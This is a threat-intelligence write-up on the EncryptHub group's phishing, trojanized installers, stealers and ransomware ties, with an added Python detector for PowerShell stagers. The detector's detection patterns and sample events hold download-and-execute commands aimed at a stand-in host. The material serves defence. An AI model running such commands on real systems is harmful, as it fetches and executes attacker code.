EncryptHub, a financially motivated cybercriminal group, has been observed running phishing campaigns that deliver information stealers and, ultimately, ransomware. The group primarily targets users of popular applications by distributing trojanized versions of widely used software. Active since June 2024, EncryptHub combines SMS phishing (smishing), voice phishing (vishing), and spear-phishing to talk victims into installing malicious software. The group, also tracked as LARVA-208, is affiliated with high-profile ransomware operations such as RansomHub and BlackSuit. Its attacks have compromised more than 600 high-value targets across multiple industries, reflecting a deliberate focus on victims that can pay.
The group's primary tactic is to set up phishing websites that imitate corporate VPN login portals. The attackers then contact employees while impersonating IT support or helpdesk staff and, under that pretext, direct them to enter their credentials on the phishing site. The sites are hosted with bulletproof providers such as Yalishanda, which makes takedown and attribution difficult. Once the stolen VPN credentials give EncryptHub a foothold in the victim's environment, the group runs PowerShell scripts that deliver a rotating set of information stealers, including Fickle Stealer, StealC, and Rhadamanthys.
The attackers’ ultimate goal is to deploy ransomware, encrypt data, and demand a ransom, often targeting large organizations for maximum financial gain.
In addition to phishing sites, EncryptHub uses trojanized applications to gain initial access to victim systems. These installers look legitimate and include fake versions of popular software such as QQ Talk, Google Meet, and Microsoft Visual Studio. When a victim runs one, it starts a multi-stage loading process that ultimately delivers further payloads, such as Kematian Stealer, which harvests browser cookies and other sensitive data that the group can use for further account takeover and exploitation.
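Both initial-access paths described above (the credential-phishing foothold and the trojanized installers) end in PowerShell running a stager that pulls the next stage. The following is an added example, not code from the original report or from EncryptHub's tooling: a small scorer that runs over process-creation events and flags the traits such stagers commonly show (encoded command, hidden window, execution-policy bypass, download cradle, in-memory execution, and an installer-like parent process). The field names, the indicator weights, and the sample events are assumptions constructed for illustration; the patterns are generic PowerShell-abuse signals, not EncryptHub-specific indicators.

```python
"""Score PowerShell launches for stager-like behaviour.

Added example (not from the original report). Event schema, weights and
sample events are assumptions; adapt the parser to your EDR/Sysmon fields.
"""
import base64
import re
from typing import Optional

# (name, case-insensitive regex, weight). Generic PowerShell-abuse signals.
INDICATORS = [
    ("encoded_command", r"\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 1),
    ("bypass_policy", r"-(?:ep|executionpolicy)\s+bypass", 1),
    ("noprofile", r"-nop\b|-noprofile", 1),
    ("download_cradle", r"(?:downloadstring|downloadfile|invoke-webrequest|iwr|"
                        r"curl|wget|net\.webclient|bitstransfer)", 2),
    ("iex", r"\b(?:iex|invoke-expression)\b", 2),
    ("http_url", r"https?://", 1),
]
# Parent images that should rarely spawn PowerShell at all (assumption).
SUSPICIOUS_PARENT_FRAGMENTS = ("setup", "install", "msiexec", "winword", "excel", "outlook")
PARENT_WEIGHT = 2
THRESHOLD = 4


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE payload of a -EncodedCommand argument, if present."""
    m = re.search(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})",
                  cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(parent: str, cmdline: str) -> dict:
    """Score one process-creation event; indicators are matched against the
    raw command line plus any decoded -EncodedCommand payload."""
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text = f"{cmdline} {decoded}"
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, text, re.I)]
    total = sum(w for name, _, w in INDICATORS if name in hits)
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    if any(frag in parent_name for frag in SUSPICIOUS_PARENT_FRAGMENTS):
        hits.append("suspicious_parent")
        total += PARENT_WEIGHT
    return {"parent": parent, "score": total, "hits": hits,
            "flagged": total >= THRESHOLD, "decoded": decoded}


def analyze(events: list[dict]) -> list[dict]:
    """Score a batch of events shaped like {'parent': ..., 'cmdline': ...}."""
    return [score_event(e["parent"], e["cmdline"]) for e in events]


# --- constructed sample events (not real telemetry) --------------------------
_STAGE2 = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2.ps1")'
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # Benign: scheduled inventory script, no network activity.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
    # Stager launched by a fake installer: encoded, hidden, policy bypass.
    {"parent": r"C:\Users\user\Downloads\installer_setup.exe",
     "cmdline": f"powershell.exe -nop -w hidden -ep bypass -enc {_ENCODED}"},
    # Plain-text download cradle with a hidden window.
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell -w hidden -c "iwr http://example.invalid/a.ps1 '
                r'-OutFile $env:TEMP\a.ps1; & $env:TEMP\a.ps1"'},
]

if __name__ == "__main__":
    for result in analyze(SAMPLE_EVENTS):
        flag = "ALERT" if result["flagged"] else "ok   "
        print(f"{flag} score={result['score']:2d} hits={result['hits']}")
```

Decoding the `-EncodedCommand` argument before matching is the part that matters most: the cradle and `IEX` in the second sample are invisible in the raw command line, and a scorer that looks only at the outer string would see just the launch flags. The parent-process bonus exists because the page's trojanized-installer path gives PowerShell an unusual parent, which is a cheap signal independent of the script's contents.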
The attackers can then move laterally within the network, escalating their access and control over critical systems and data.
To expand its reach, EncryptHub has also bought installs from third-party Pay-Per-Install (PPI) services such as LabInstalls, which distribute malware in bulk on behalf of paying customers. LabInstalls' advertised pricing runs from $10 for 100 installs to $450 for 10,000, giving EncryptHub a cheap way to grow its victim base without running every campaign itself.
The group has also been developing a new tool, EncryptRAT, a command-and-control (C2) panel for managing active infections, issuing remote commands, and exfiltrating stolen data. There is speculation that EncryptHub may eventually sell the tool to other criminals, consistent with its ongoing effort to refine its tooling and scale its operations. Given the tradecraft described here, defenders should pay particular attention to helpdesk-impersonation attempts against staff, to software installed from unofficial download sources, and to PowerShell activity that fetches and runs remote content, alongside the usual layered controls.